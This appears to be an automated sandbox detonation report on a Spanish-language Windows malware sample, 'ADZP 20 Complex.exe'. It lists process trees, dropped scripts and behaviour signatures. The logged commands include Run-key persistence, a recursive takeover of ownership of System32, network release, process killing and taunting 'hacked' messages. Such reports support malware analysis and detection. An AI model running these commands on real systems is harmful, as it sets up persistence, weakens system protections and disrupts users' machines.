C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8823.tmp\8824.tmp\8825.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8F35.tmp\8F36.tmp\8F37.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\96C3.tmp\96C4.tmp\96C5.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19360813717422815761624925029-56308644718919876791523634329-4575256441454145225"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB53.tmp\BB54.tmp\BB55.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BE7F.tmp\BE80.tmp\BE81.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF88.tmp\BF98.tmp\BF99.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C571.tmp\C572.tmp\C573.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C5AF.tmp\C5B0.tmp\C5B1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C5DE.tmp\C5DF.tmp\C5E0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\SysWOW64\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
Network
Files
C:\Users\Admin\AppData\Local\Temp\317C.tmp\317D.tmp\317E.bat
C:\Windows\System32\Twain_20.dll
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-25 16:32
Reported
2024-05-25 16:35
Platform
win10v2004-20240426-en
Max time kernel
18s
Max time network
154s
Command Line
Signatures
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3A0B.tmp\3A0C.tmp\3A0D.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4343.tmp\4344.tmp\4345.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\44AA.tmp\44BB.tmp\44BC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\45F2.tmp\45F3.tmp\45F4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8A8D.tmp\8A8E.tmp\8A8F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8AAC.tmp\8AAD.tmp\8AAE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8BA6.tmp\8BA7.tmp\8BA8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9337.tmp\9338.tmp\9339.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\979C.tmp\979D.tmp\979E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\97BC.tmp\97BD.tmp\97BE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A316.tmp\A317.tmp\A327.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
